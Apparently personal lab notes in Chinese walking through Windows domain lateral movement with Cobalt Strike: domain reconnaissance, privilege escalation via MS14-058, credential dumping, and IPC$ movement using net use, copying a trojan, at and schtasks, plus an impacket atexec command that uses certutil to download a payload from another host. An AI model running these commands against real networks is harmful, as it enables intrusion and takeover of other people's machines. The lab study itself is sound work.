因为只有一台云服务器而且开不起台多的虚拟机只能只用几台进行演示😭😭😭

小迪的环境

上线之后先做的事情：

IPC方式进行横向移动

• at

• schtasks

他这里第三条命令有问题换成这个可以执行

schtasks /create /s 172.16.3.128 /U administrator /P QWEasd123 /ru "SYSTEM" /tn beacon /sc DAILY /tr c:\win7rn.exe /F #创建becaon任务对应执行文件

第四条也有问题换成这个

schtasks /s 172.16.3.128 /U administrator /P QWEasd123 /RUN /TN beacon /i #运行beacon任务

这个套件有python版本和exe的，exe的文件太大了好用是好用，而且文件太大了容易报警引起感知

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.

GitHub - maaaaz/impacket-examples-windows: The great impacket example scripts compiled for Windows

exe版本可以实现使用hash值进行操作有点意思

复现:

DC域控 172.16.3.3        域用户user3        win7主机 172.16.3.

之前已近搭建好了DC域控，然后域是niganma.hhh 分别将几台主机加入域环境先

win7加入域环境

将win7的dns地址填写DC的ip地址（DC的dns填写127.0.0.1）

然后再添加到域中

重启后通过域用户进行登录才会登录进域

查看一下域时间如果有就是在域环境里面了，然后将另外一台也拖入域内。

目前的环境大概是这样的

因为是在已经拿下了web服务器的权限的情况下进一步的渗透，所以这里直接放木马到web服务器上运行了

按照正常步骤走，上线之后首先进行一些信息收集，比如首先判断是否处于内网环境

使用net time /domain 成功了就代表在内网的环境

拿到这个域的可以去ping它获取到域控 的地址

shell ping DC.niganma.hhh

此时就可以确认域控的ip为172.16.3.3

然后shell net user /domain 收集域内用户的信息

然后做一下网络探测和端口扫描，这里可能会遇到权限不足的情况就无法进行所以有时候要先进行提权，进行端口扫描会顺便进行主机存活的探测

扫描完后看看目标列表，在上面的视图里面这个目标列表，同时前期的信息收集判断了3.3是DC这里就可以给他标记一下，右键主机备注

在域内的横向渗透基本上是通过获取到的密码凭据，所以这里我们可以先抓取hash或者明文密码（然后发现我这里权限不够所以需要先提权，然后使用cs自带的提权就提到powershell。。。这里用了几种插件里面携带的提权方式，最终MS14-058（CVE-2014-4113拿到了system权限，也就是说想要获取hash要么是adminstrator权限要么是system权限）

        这一下基本上的密码就拿到手了，我这里user4就是这个域用户的密码，明文也被抓出来了，不过这个主机我没有用域控的账号在上面登录过，好像只要在这个主机上登录过的等会被抓取出来

解下来使用IPC的方式进行横向移动

这里先演示怎么进行IPC的操作，这里演示要用到域控的权限才可以进行。后面还会有不用域控权限也拿下的演示

有两种IPC的方式对应的不同的版本，

        1、小于win2012的用at

        2、大于win2012的用schtasks

at方式

        首先我们需要判断是否出网那个，使用ping就可以判断出来，然后如果我们想拿下内网172.16.3.134用户主机，我们可以选择正向或者反向的链接对吧，这里首先生成一个正向的木马出来，然后把这个木马先放到我们控制的这个web主机上面去

监听器：

然后找到文件浏览将生成的木马上传上去，放到当前的目录 下

然后使用命令

net use \\172.16.3.134\ipc$ "QWEasd123" /user:niganma.hhh\administrator #这里填要移动到的主机IP，然后是域控的账号

copy win7rn.exe \\172.16.3.134\c$ #将木马复制过去

显示已复制就是成功了，在靶机这边也可以看到

at \\172.16.3.134 20:58 c:\win7rn.exe #设置一个定时任务去执行这个程序，这里执行命令建议先看一下域内的时间，而不是看我们自己的时间。。。

然后时间到了后就可以主动去连接它

connect 172.16.3.134 4444

因为是用的域控的权限所以拿到就是最高的权限

到这里演示完毕先把这个下线了

schtasks

这里为了演示这个我不得不新添加了一台win2012的虚拟机，IP为172.16.3.128

更新拓扑

然后cs重新扫描一下存活主机

然后先IPC连接到win2012

net use \\172.16.3.128\ipc$ "QWEasd123" /user:niganma.hhh\administrator

copy win7rn.exe \\172.16.3.128\c$ #复制到对方c盘下

schtasks /create /s 172.16.3.128 /U administrator /P QWEasd123 /ru "SYSTEM" /tn beacon /sc DAILY /tr c:\win7rn.exe /F #创建becaon任务对应执行文件

schtasks /s 172.16.3.128 /U administrator /P QWEasd123 /RUN /TN beacon /i #运行beacon任务

执行程序成功然后主动连接就可以了，也是成功上线了

除了手工输入命令在插件里面也是集成了此链接方式

shelll net use 查看建立的链接（我这里重新建立的和134的链接，使用插件可以删除建立的链接）

到此简单的IPC的方式演示完毕，把这个会话删除退出。

使用IPC套件版-Impacket-atexec

impacket-atexec

exe文件就这样

使用这个exe文件可以使用hash进行IPC连接，但是我这里没有dump到管理员的账号和密码所以就不做演示

这是使用certutil进行下载文件的命令，不过我这个web机不知道怎么回事进了域启动小p有问题。。。

atexec.exe niganma/administrator:QWEasd123@192.168.3.134 "certutil -f -split -urlcache http://172.16.3.131:80/payload.exe beacon.exe"

工具的使用没有演示了，然后就是python脚本演示鸽了几天忘记了没演示了。。。